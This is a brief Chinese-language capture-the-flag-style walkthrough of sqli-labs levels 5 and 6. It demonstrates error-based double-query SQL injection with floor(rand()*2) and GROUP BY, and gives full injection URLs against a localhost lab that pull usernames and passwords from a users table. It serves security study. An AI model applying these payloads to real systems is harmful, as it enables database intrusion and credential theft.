GET-Double injection-Single Quotes-String (双注入GET单引号字符型注入) Less-5
GET-Double injection-Double Quotes-String (双注入GET双引号字符型注入) Less-6
进入第五关后基础准备基本句式:
select count(*), concat((select database()), floor(rand()*2))as a from information_schema.tables group by a;
进入双注入的关卡以后,我们会发现一些区别,就是无论怎么输入都不会返回数据库的查询结果,只会输出you are in,但是有错误会返回提示信息,所以我们只能从错误信息查我们想要的结果
老规矩,我们测一下数据类型
可以看出是单引号闭合
我们直接调用双注入联合查询
http://127.0.0.1/Less-5/?id=' union select 1, count(*), concat('~',(select concat(username,'/',password) from users limit 0,1),'~', floor(rand(0)*2))as a from information_schema.tables group by a -- a
这样我们就可以得到我们想要的结果
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
第六关和第五关基本相同
我们加入符号判断,返回信息提示为双引号闭合
http://127.0.0.1/sqli-labs/Less-5/?id="union select 1, count(*), concat('~',(select concat(username,'/',password) from users limit 0,1),'~', floor(rand(0)*2))as a from information_schema.tables group by a -- a
嵌套查询
可以得到结果